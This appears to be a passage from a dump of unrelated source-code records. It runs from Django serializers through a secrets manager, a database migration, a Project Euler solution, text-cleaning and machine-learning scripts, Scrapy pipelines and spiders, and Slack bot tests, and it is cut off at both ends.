}\n\n\nclass UserUpdateSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user update or creation\"\"\"\n class Meta:\n \"\"\"Meta class for User update serializer without email as unique field\"\"\"\n model = get_user_model()\n fields = ('email',\n 'password',\n 'id',\n 'name',\n 'is_professor',\n 'is_student',\n 'is_university_administrator',\n 'user_image',\n 'avatar_num')\n extra_kwargs = {'password': {'write_only': True, 'min_length': 6}}\n\n\nclass PhotoUploadSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for user_image upload for User model\"\"\"\n\n class Meta:\n \"\"\"Meta class for PhotoUploadSerializer\"\"\"\n model = get_user_model()\n fields = ('user_image',)\n\n\nclass GeneralUserSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for getting basic User info\"\"\"\n\n class Meta:\n \"\"\"Meta class for GeneralUserSerializer\"\"\"\n model = get_user_model()\n \"\"\"Meta class for User\"\"\"\n fields = ('id', 'email', 'name')\n\n\nclass CreateUpdateStudentSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Student\"\"\"\n class Meta:\n \"\"\"Meta class for CreateUpdateStudentSerializer\"\"\"\n model = Student\n \"\"\"Meta class for CreateStudentSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute', 'entry_semester', 'approx_exit_semester')\n\n\nclass CreateUpdateProfessorSerializer(serializers.ModelSerializer):\n \"\"\"Serializer for creating or updating Professor\"\"\"\n\n class Meta:\n \"\"\"Meta class for CreateUpdateProfessorSerializer\"\"\"\n model = Professor\n \"\"\"Meta class for CreateProfessorSerializer\"\"\"\n fields = ('id', 'field_of_studies', 'institute')\n\n\nclass InstituteSerializer(serializers.ModelSerializer):\n \"\"\"Institute model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for Institute serializer\"\"\"\n model = Institute\n fields = ('name', 'id')\n\n\nclass FieldOfStudiesSerializer(serializers.ModelSerializer):\n \"\"\"FieldOfStudies model serializer\"\"\"\n\n class Meta:\n \"\"\"Meta class for FieldOfStudies serializer\"\"\"\n model = FieldOfStudies\n fields = ['name', 'id']\n\n\nclass CourseSerializer(serializers.ModelSerializer):\n \"\"\"Course model serializer\"\"\"\n field_of_studies = FieldOfStudiesSerializer(required=True)\n professor = CreateUpdateProfessorSerializer(required=True)\n\n class Meta:\n \"\"\"Meta class for Course serializer\"\"\"\n model = Course\n fields = ['name', 'field_of_studies', 'professor', 'id']\n\n\nclass StudentSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Student with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Student serializer with courses\"\"\"\n model = Student\n fields = ('id',\n 'field_of_studies',\n 'institute', 'user',\n 'entry_semester',\n 'approx_exit_semester',\n 'courses')\n\n\nclass ProfessorSerializerWithCourses(serializers.ModelSerializer):\n \"\"\"Serializer for getting Professor with courses\"\"\"\n id = serializers.ReadOnlyField()\n user = UserRegistrationSerializer(required=True)\n institute = InstituteSerializer(required=True)\n field_of_studies = FieldOfStudiesSerializer(required=True)\n taught_courses = CourseSerializer(source=\"course_set\", many=True)\n\n class Meta:\n \"\"\"Meta class for Professor serializer with courses\"\"\"\n model = Professor\n fields = ('id',\n 'field_of_studies',\n 'institute',\n 'user',\n 'taught_courses')\n","sub_path":"app/user_administration/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"205912401","text":"# Copyright 2017 AT&T Intellectual Property. All other rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom oslo_log import log as logging\n\nfrom deckhand.barbican import driver\nfrom deckhand.db.sqlalchemy import api as db_api\nfrom deckhand.engine import document as document_wrapper\nfrom deckhand import utils\n\nLOG = logging.getLogger(__name__)\n\nCLEARTEXT = 'cleartext'\nENCRYPTED = 'encrypted'\n\n\nclass SecretsManager(object):\n \"\"\"Internal API resource for interacting with Barbican.\n\n Currently only supports Barbican.\n \"\"\"\n\n barbican_driver = driver.BarbicanDriver()\n\n def create(self, secret_doc):\n \"\"\"Securely store secrets contained in ``secret_doc``.\n\n Ordinarily, Deckhand documents are stored directly in Deckhand's\n database. However, secret data (contained in the data section for the\n documents with the schemas enumerated below) must be stored using a\n secure storage service like Barbican.\n\n Documents with ``metadata.storagePolicy`` == \"clearText\" have their\n secrets stored directly in Deckhand.\n\n Documents with ``metadata.storagePolicy`` == \"encrypted\" are stored in\n Barbican directly. Deckhand in turn stores the reference returned\n by Barbican in Deckhand.\n\n :param secret_doc: A Deckhand document with one of the following\n schemas:\n\n * ``deckhand/Certificate/v1``\n * ``deckhand/CertificateKey/v1``\n * ``deckhand/Passphrase/v1``\n\n :returns: Dictionary representation of\n ``deckhand.db.sqlalchemy.models.DocumentSecret``.\n \"\"\"\n encryption_type = secret_doc['metadata']['storagePolicy']\n secret_type = self._get_secret_type(secret_doc['schema'])\n\n if encryption_type == ENCRYPTED:\n # Store secret_ref in database for `secret_doc`.\n kwargs = {\n 'name': secret_doc['metadata']['name'],\n 'secret_type': secret_type,\n 'payload': secret_doc['data']\n }\n resp = self.barbican_driver.create_secret(**kwargs)\n\n secret_ref = resp['secret_href']\n created_secret = {'secret': secret_ref}\n elif encryption_type == CLEARTEXT:\n created_secret = {'secret': secret_doc['data']}\n\n return created_secret\n\n def _get_secret_type(self, schema):\n \"\"\"Get the Barbican secret type based on the following mapping:\n\n ``deckhand/Certificate/v1`` => certificate\n ``deckhand/CertificateKey/v1`` => private\n ``deckhand/Passphrase/v1`` => passphrase\n\n :param schema: The document's schema.\n :returns: The value corresponding to the mapping above.\n \"\"\"\n _schema = schema.split('/')[1].lower().strip()\n if _schema == 'certificatekey':\n return 'private'\n return _schema\n\n\nclass SecretsSubstitution(object):\n \"\"\"Class for document substitution logic for YAML files.\"\"\"\n\n def __init__(self, documents):\n \"\"\"SecretSubstitution constructor.\n\n :param documents: List of YAML documents in dictionary format that are\n candidates for secret substitution. This class will automatically\n detect documents that require substitution; documents need not be\n filtered prior to being passed to the constructor.\n \"\"\"\n if not isinstance(documents, (list, tuple)):\n documents = [documents]\n substitute_docs = [document_wrapper.Document(d) for d in documents if\n 'substitutions' in d['metadata']]\n self.documents = substitute_docs\n\n def substitute_all(self):\n \"\"\"Substitute all documents that have a `metadata.substitutions` field.\n\n Concrete (non-abstract) documents can be used as a source of\n substitution into other documents. This substitution is\n layer-independent, a document in the region layer could insert data\n from a document in the site layer.\n\n :returns: List of fully substituted documents.\n \"\"\"\n LOG.debug('Substituting secrets for documents: %s', self.documents)\n substituted_docs = []\n\n for doc in self.documents:\n LOG.debug(\n 'Checking for substitutions in schema=%s, metadata.name=%s',\n doc.get_name(), doc.get_schema())\n for sub in doc.get_substitutions():\n src_schema = sub['src']['schema']\n src_name = sub['src']['name']\n src_path = sub['src']['path']\n if src_path == '.':\n src_path = '.secret'\n\n # TODO(fmontei): Use secrets_manager for this logic. Need to\n # check Barbican for the secret if it has been encrypted.\n src_doc = db_api.document_get(\n schema=src_schema, name=src_name, is_secret=True,\n **{'metadata.layeringDefinition.abstract': False})\n src_secret = utils.jsonpath_parse(src_doc['data'], src_path)\n\n dest_path = sub['dest']['path']\n dest_pattern = sub['dest'].get('pattern', None)\n\n LOG.debug('Substituting from schema=%s name=%s src_path=%s '\n 'into dest_path=%s, dest_pattern=%s', src_schema,\n src_name, src_path, dest_path, dest_pattern)\n substituted_data = utils.jsonpath_replace(\n doc['data'], src_secret, dest_path, dest_pattern)\n doc['data'].update(substituted_data)\n\n substituted_docs.append(doc.to_dict())\n return substituted_docs\n","sub_path":"deckhand/engine/secrets_manager.py","file_name":"secrets_manager.py","file_ext":"py","file_size_in_byte":6156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321115746","text":"\"\"\"Added tags\n\nRevision ID: f38564e35d62\nRevises: 7dd0f5e2bfb9\nCreate Date: 2021-03-07 18:57:26.297863\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.orm import Session\nfrom app.models import XSS\nimport json\n\n\n# revision identifiers, used by Alembic.\nrevision = \"f38564e35d62\"\ndown_revision = \"7dd0f5e2bfb9\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.add_column(sa.Column(\"tags\", sa.Text(), server_default=\"[]\", nullable=False))\n\n conn = op.get_bind()\n session = Session(bind=conn)\n\n for xss in session.query(XSS).all():\n xss_data = json.loads(xss.data)\n for element_name, element_value in xss_data.items():\n if element_name in [\"local_storage\", \"session_storage\", \"cookies\"]:\n if isinstance(element_value, list):\n new_data = {}\n for single_element in element_value:\n new_data.update(single_element)\n xss_data[element_name] = new_data\n xss.data = json.dumps(xss_data)\n\n xss_headers = json.loads(xss.headers)\n new_headers = {}\n if isinstance(xss_headers, list):\n for header in xss_headers:\n new_headers.update(header)\n xss.headers = json.dumps(new_headers)\n\n session.commit()\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table(\"XSS\", schema=None) as batch_op:\n batch_op.drop_column(\"tags\")\n\n # ### end Alembic commands ###\n","sub_path":"server/migrations/versions/f38564e35d62_added_tags.py","file_name":"f38564e35d62_added_tags.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"24238070","text":"#Starting in the top-left corner of a 2x2 grid, and only being able to move to the right and down, there are exactly 6 routes to the bottom-right corner.\n#How many such routes are there through a 20x20 grid?\nimport time\nfrom math import factorial as fact\n\n\ndef latt_paths(n=20):\n #Follows binomial(2*n, n)\n return fact(2*n) / (fact(n) ** 2)\n\ndef ans(times):\n l = []\n for k in xrange(times):\n start_t = time.time()\n z = latt_paths()\n end_t = time.time()\n time_taken = end_t - start_t\n l.append(time_taken)\n return sorted(l)\n","sub_path":"solved/und1sec/p15.py","file_name":"p15.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"305626399","text":"import re\r\nimport yaml\r\nimport enchant\r\nfrom nltk.corpus import wordnet\r\nfrom nltk.metrics import edit_distance\r\n\r\n#Class for removing repetitive characters from a word:\r\nclass RepetitionCorrector:\r\n def __init__(self):\r\n self.repeat_regexp = re.compile(r'(\\w*)(\\w)\\2(\\w*)')\r\n self.repl = r'\\1\\2\\3'\r\n\r\n def replace(self, word):\r\n if wordnet.synsets(word):\r\n return word\r\n\r\n repl_word = self.repeat_regexp.sub(self.repl, word)\r\n\r\n if repl_word != word:\r\n return self.replace(repl_word)\r\n else:\r\n return repl_word\r\n\r\n#Class for correcting misspelled words:\r\nclass SpellingCorrector:\r\n def __init__(self, dict_name='en-US', max_dist=2):\r\n self.spell_dict = enchant.Dict(dict_name)\r\n self.max_dist = max_dist\r\n\r\n def replace(self, word):\r\n if self.spell_dict.check(word):\r\n return word\r\n\r\n suggestions = self.spell_dict.suggest(word)\r\n if suggestions and edit_distance(word, suggestions[0]) <= self.max_dist:\r\n return suggestions[0]\r\n else:\r\n return word\r\n\r\n#Class for replacing negative words with word's antonyms:\r\nclass NegationRemover:\r\n def __init__(self, fileName):\r\n self.ant_list = yaml.load(open(fileName))\r\n\r\n def remove(self, word): \r\n return self.ant_list.get(word, word)\r\n\r\n def remove_negations(self, sent):\r\n i, l = 0, len(sent)\r\n words = []\r\n while i < l: \r\n word = sent[i]\r\n if word == 'not' and i+1 < l:\r\n antonym = self.remove(sent[i+1])\r\n if antonym:\r\n words.append(antonym)\r\n i += 2\r\n continue\r\n \r\n words.append(word)\r\n i += 1\r\n \r\n return words\r\n","sub_path":"Training and Testing/prepro_lib/text_cleaner.py","file_name":"text_cleaner.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"208243924","text":"import datetime\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.ensemble import GradientBoostingClassifier\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\npd.set_option('display.max_columns', None)\r\ndataframe = pd.read_csv('features.csv', index_col='match_id')\r\ndataframe.head()\r\ndataframe.drop([\"duration\", \"tower_status_radiant\", \"tower_status_dire\", \"barracks_status_radiant\",\r\n \"barracks_status_dire\", ], axis=1, inplace=True)\r\ncountna = len(dataframe) - dataframe.count()\r\nprint(countna[countna > 0].sort_values(ascending=False))\r\ndataframe.fillna(0, inplace=True)\r\n\r\nX_train = dataframe.drop(\"radiant_win\", axis=1)\r\ny_train = dataframe[\"radiant_win\"]\r\n\r\nCV = KFold(n_splits=5, shuffle=True, random_state=42)\r\n\r\n\r\ndef score_trees(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for n_estimators in [10, 20, 30, 50]:\r\n print(f\"n_estimators={n_estimators}\")\r\n model_trees = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model_trees, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[n_estimators] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\nscores = score_trees(X_train, y_train)\r\n\r\nscaler = StandardScaler()\r\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\r\n\r\n\r\ndef score_linear(X: pd.DataFrame, y: pd.Series) -> pd.Series:\r\n scores = {}\r\n\r\n for i in range(-5, 6):\r\n C = 10.0 ** i\r\n\r\n print(f\"C={C}\")\r\n model = LogisticRegression(C=C, random_state=42)\r\n\r\n start_time = datetime.datetime.now()\r\n score = cross_val_score(model, X, y, cv=CV, scoring=\"roc_auc\", n_jobs=-1).mean()\r\n print(f\"Score: {score:.3f}\")\r\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\r\n\r\n scores[i] = score\r\n print()\r\n\r\n return pd.Series(scores)\r\n\r\n\r\ndef best_linear_score(scores: pd.Series):\r\n best_iter = scores.sort_values(ascending=False).head(1)\r\n best_C = 10.0 ** best_iter.index[0]\r\n print(f\"best_iter.index[0] = {best_iter.index}\")\r\n best_score = best_iter.values[0]\r\n\r\n print(f\"Наилучшее значение AUC-ROC при C = {best_C:.2f} равно {best_score:.2f}.\")\r\n\r\n\r\nbest_linear_score(scores)\r\n\r\nhero_columns = [f\"r{i}_hero\" for i in range(1, 6)] + [f\"d{i}_hero\" for i in range(1, 6)]\r\ncat_columns = [\"lobby_type\"] + hero_columns\r\nX_train.drop(cat_columns, axis=1, inplace=True)\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\n\r\nunique_heroes = np.unique(dataframe[hero_columns].values.ravel())\r\nN = max(unique_heroes)\r\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. Максимальный ID героя: {N}.\")\r\n\r\n\r\ndef pick(data: pd.DataFrame) -> pd.DataFrame:\r\n X_pick = np.zeros((data.shape[0], N))\r\n\r\n for i, match_id in enumerate(data.index):\r\n for p in range(1, 6):\r\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\r\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\r\n\r\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\r\n\r\n\r\nX_pick = pick(dataframe)\r\nX_pick.head()\r\nX_train = pd.concat([X_train, X_pick], axis=1)\r\n\r\nscores = score_linear(X_train, y_train)\r\nbest_linear_score(scores)\r\nmodel = LogisticRegression(C=0.1, random_state=42)\r\nmodel.fit(X_train, y_train)\r\n\r\ntestframe = pd.read_csv(\"features_test.csv\", index_col=\"match_id\")\r\ntestframe.fillna(0, inplace=True)\r\n\r\nX_test = pd.DataFrame(scaler.transform(testframe), index=testframe.index, columns=testframe.columns)\r\nX_test.drop(cat_columns, axis=1, inplace=True)\r\nX_test = pd.concat([X_test, pick(testframe)], axis=1)\r\nX_test.head()\r\n\r\npredictions = pd.Series(model.predict_proba(X_test)[:, 1])\r\nprint(predictions.describe())\r\n","sub_path":"ML/final_task.py","file_name":"final_task.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"634553461","text":"# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\n\n\n# useful for handling different item types with a single interface\nfrom itemadapter import ItemAdapter\n\nimport pymysql\n\nclass LottoPipeline:\n def process_item(self, item, spider):\n return item\n\nclass LottoInsertNumberPipeline:\n\n def open_spider(self, spider):\n print(\"################################# open spider\")\n if spider.name == \"LottoSpider3\":\n conn = pymysql.connect(host=\"localhost\",\n database=\"exampledb\",\n user=\"root\",\n password=\"mysql\",\n charset=\"utf8\")\n \n self.conn = conn\n\n # 아래 with 구문은 테스트용 코드\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"DELETE FROM WINNING_NUMBERS\"\n cursor.execute(sql) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n\n def process_item(self, item, spider):\n print(\"################################# process item\")\n if spider.name == \"LottoSpider3\":\n with self.conn.cursor() as cursor: # with가 종료될 때 cursor.close() 자동 호출\n sql = \"INSERT INTO winning_numbers values (%s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n cursor.execute(sql, item.to_list()) \n self.conn.commit() # 이전에 실행된 SQL 결과를 확정\n\n return item\n\n def close_spider(self, spider):\n print(\"################################# close spider\")\n if spider.name == \"LottoSpider3\" and self.conn != None:\n self.conn.close()\n ","sub_path":"workspaces/python-basic/scrapy/lotto/lotto/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"431668234","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\Products\\ATGoogleMaps\\config.py\n# Compiled at: 2010-06-03 09:07:26\n\"\"\"Common configuration constants\n\"\"\"\nPROJECTNAME = 'ATGoogleMaps'\nADD_PERMISSIONS = {'GMap': 'ATGoogleMaps: Add GMap', \n 'GMarker': 'ATGoogleMaps: Add GMarker', \n 'GPolyline': 'ATGoogleMaps: Add GPolyline'}","sub_path":"pycfiles/Products.ATGoogleMaps-0.7-py2.6/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"35268470","text":"\"\"\"\nTest point counter functionality\n\"\"\"\nimport unittest\n\nfrom google.auth import exceptions\n\nfrom main import PointCounter, get_client\nfrom consts import ADMIN_CHANNEL\n\nTEST_PREFECTS = [\"prefect\"]\nTEST_POINTS = \"dataset/hackathon.test.json\"\n\n\nclass TestPointCounter(unittest.TestCase):\n \"\"\"Initialize a point counter and test response messages\"\"\"\n\n def setUp(self):\n self.p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n\n def test_post_update(self):\n try:\n get_client()\n except exceptions.DefaultCredentialsError:\n print(\"Skipping bucket test - no permission file found!\")\n return\n\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS, reset=True)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.post_update()\n\n p2 = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n self.assertEqual(p2.points['Gryffindor'], 6)\n\n def test_adding_points(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"10 points to Gryffindor\", TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 10 points\", msg[0])\n\n def test_parsing_edge_case(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n edge_cases = [\n \"1 point to gryffindor for <@U15BW22P9> ... 5 years ago\",\n \"....1 point to gryffindor\",\n ]\n for slack_msg in edge_cases:\n msg = p.award_points(\n slack_msg,\n TEST_PREFECTS[0])\n self.assertIn(\"<@prefect> Gryffindor gets 1 point\", msg[0])\n\n def test_adding_points_not_by_prefect(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"6 points to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n msg = p.award_points(\"oNe point to Gryffindor\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Gryffindor gets 1 point\", m)\n\n def test_adding_one_point_to_slytherin(self):\n msg = self.p.award_points(\n \"1 point to slytherin for @benkraft making slackbot\"\n \" listen for '911' mentions in 1s and 0s\", \"harry potter\")\n for m in msg:\n self.assertIn(\"<@harry potter> Slytherin gets 1 point\", m)\n\n def test_subtracting_one_point_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"prefect\")\n self.assertIn(\"<@prefect> Gryffindor loses 1 point\", msgs[0])\n\n def test_subtracting_one_point_not_prefect(self):\n msgs = self.p.award_points(\"oNe point from Gryffindor\", \"harry potter\")\n self.assertEqual(len(msgs), 0)\n\n def test_works_with_usernames(self):\n message = \"1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"nymphadora tonks\"):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_with_prefect(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R>\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_with_prefect_with_reason(self):\n message = \"Dumbledore awards 1 point to ravenclaw <@U0NJ1PH1R> for making reason works\"\n for m in self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL):\n self.assertEqual(\n m[0], \"awards 1 point to Ravenclaw for making reason works :ravenclaw: :small_green_triangle_up:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_takes_away_with_prefect(self):\n self.p.award_points(\"10 points to Gryffindor\",\n TEST_PREFECTS[0], channel=ADMIN_CHANNEL)\n message = \"Dumbledore takes away 1 point from Gryffindor <@U0NJ1PH1R> because of breaking reason\"\n for m in self.p.award_points(message, \"prefect\"):\n self.assertEqual(\n m[0], \"takes away 1 point from Gryffindor for breaking reason \"\n \":gryffindor: :small_red_triangle_down:\")\n self.assertEqual(m[1], \"dumbledore\")\n\n def test_works_with_dumbledore_normal(self):\n message = \"awards 1 point to ravenclaw <@U0NJ1PH1R> for cheating\"\n for m in self.p.award_points(message, \"nymphadora tonks\", channel=ADMIN_CHANNEL):\n self.assertIn(\"<@nymphadora tonks> Ravenclaw gets 1 point\", m)\n\n def test_works_with_dumbledore_says_with_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(message, \"prefect\", channel=ADMIN_CHANNEL)\n self.assertIsInstance(msg[0], tuple)\n msg_text, char = msg[0]\n self.assertEqual(msg_text, \"ho ho ho :party-khan:\")\n self.assertEqual(char, \"dumbledore\")\n\n def test_works_with_dumbledore_says_no_prefect(self):\n message = \"Dumbledore says ho ho ho :party-khan:\"\n msg = self.p.award_points(\n message, \"Harry potter\", channel=ADMIN_CHANNEL)\n self.assertEqual(len(msg), 0)\n\n def test_calculate_standings(self):\n p = PointCounter(TEST_PREFECTS, points_file=TEST_POINTS)\n p.award_points(\"6 points to Gryffindor\", TEST_PREFECTS[0])\n p.award_points(\"7 points to Ravenclaw\", TEST_PREFECTS[0])\n p.award_points(\"8 points to Hufflepuff\", TEST_PREFECTS[0])\n p.award_points(\"9 points to Slytherin\", TEST_PREFECTS[0])\n for m in p.print_status():\n print(m)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"src/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7606733","text":"\"\"\"\n创建三个学校且三个学校的设施内容等都是一致.\n\"\"\"\nclass School(object):\n def __init__(self, name, address):\n self.name = name\n self.address = address\n\n def speech(self):\n print('讲课')\n\nobj1 = School('老男孩北京校区', '美丽富饶的沙河')\nobj2 = School('老男孩上海校区', '浦东新区')\nobj3 = School('老男孩深圳校区', '南山区')\n\n\nclass Teacher(object):\n def __init__(self, name, age, salary):\n self.name = name\n self.age = age\n self.__salary = salary\n self.school = None\n\nt1 = Teacher('李杰', 19, 188888)\nt2 = Teacher('艳涛', 18, 60)\nt3 = Teacher('女神', 16, 900000)\n# ############## 老师分配校区\nt1.school = obj1\nt2.school = obj1\nt3.school = obj2\n# ####################################\n# 查看t1老师,所在的校区名称/地址\nprint(t1.school.name)\nprint(t1.school.address)\nprint(t1.name)\nprint(t1.age)\nt1.school.speech()\n","sub_path":"p1_basic/day22_26oop/day23/11_嵌套.py","file_name":"11_嵌套.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"131952477","text":"import os\nimport yaml\nimport pandas as pd\nimport argparse\n\ndef read_params(config_path):\n with open(config_path) as yaml_file:\n config=yaml.safe_load(yaml_file)\n return config\n\ndef get_data(config_path):\n config= read_params(config_path)\n data_path=config['data_source']['s3_source']\n df=pd.read_csv(data_path,sep=',',encoding='utf-8')\n #df = pd.get_dummies(df, columns = ['famhist'], drop_first=True)\n #df.drop(\"sbp\",axis=1, inplace=True)\n return df\n\nif __name__==\"__main__\":\n args = argparse.ArgumentParser()\n args.add_argument(\"--config\", default=\"param.yaml\")\n parsed_args = args.parse_args()\n data = get_data(config_path = parsed_args.config)","sub_path":"src/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"560120074","text":"# -*- coding: utf8 -*-\nfrom datetime import datetime\nimport re\n\nfrom scrapy.http import Request, HtmlResponse\nfrom scrapy.selector import Selector\n\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.spiders.base_spiders.bazaarvoice_spider import BVNoSeleniumSpider\nfrom alascrapy.lib.generic import get_full_url, date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\nfrom alascrapy.items import CategoryItem, ProductItem, ReviewItem, ProductIdItem\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom alascrapy.lib.selenium_browser import SeleniumBrowser\n\n\nclass Cyberphoto_seSpider(AlaSpider):\n name = 'cyberphoto_se'\n allowed_domains = ['cyberphoto.se']\n start_urls = ['https://www.cyberphoto.se/bloggen']\n\n \n def parse(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n url_xpath = \"//span[contains(.,'ta sida')]/../@href\"\n single_url = self.extract(response.xpath(url_xpath))\n single_url='/bloggen'+single_url\n if single_url:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n return\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.parse)\n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n urls_xpath = \"//div[@class='blogg_big_container'][contains(.,'Test')]//a[contains(@href,'article')]/@href\"\n params_regex = {}\n urls = self.extract_list(response.xpath(urls_xpath))\n \n for single_url in urls:\n matches = None\n if \"\":\n matches = re.search(\"\", single_url, re.IGNORECASE)\n if matches:\n single_url = matches.group(0)\n else:\n continue\n single_url = get_full_url(original_url, single_url)\n \n request = Request(single_url, callback=self.level_2)\n \n \n try:\n request.meta[\"product\"] = product\n except:\n pass\n try:\n request.meta[\"review\"] = review\n except:\n pass\n yield request\n \n def level_2(self, response):\n \n original_url = response.url\n product = response.meta.get(\"product\", {})\n review = response.meta.get(\"review\", {})\n \n category_leaf_xpath = \"(//div[@id='breadcrumb_area']/a/text())[last()]\"\n category_path_xpath = \"//div[@id='breadcrumb_area']/a/text()\"\n category = CategoryItem()\n category['category_url'] = original_url\n category['category_leaf'] = self.extract(response.xpath(category_leaf_xpath))\n category['category_path'] = self.extract_all(response.xpath(category_path_xpath), ' | ')\n if 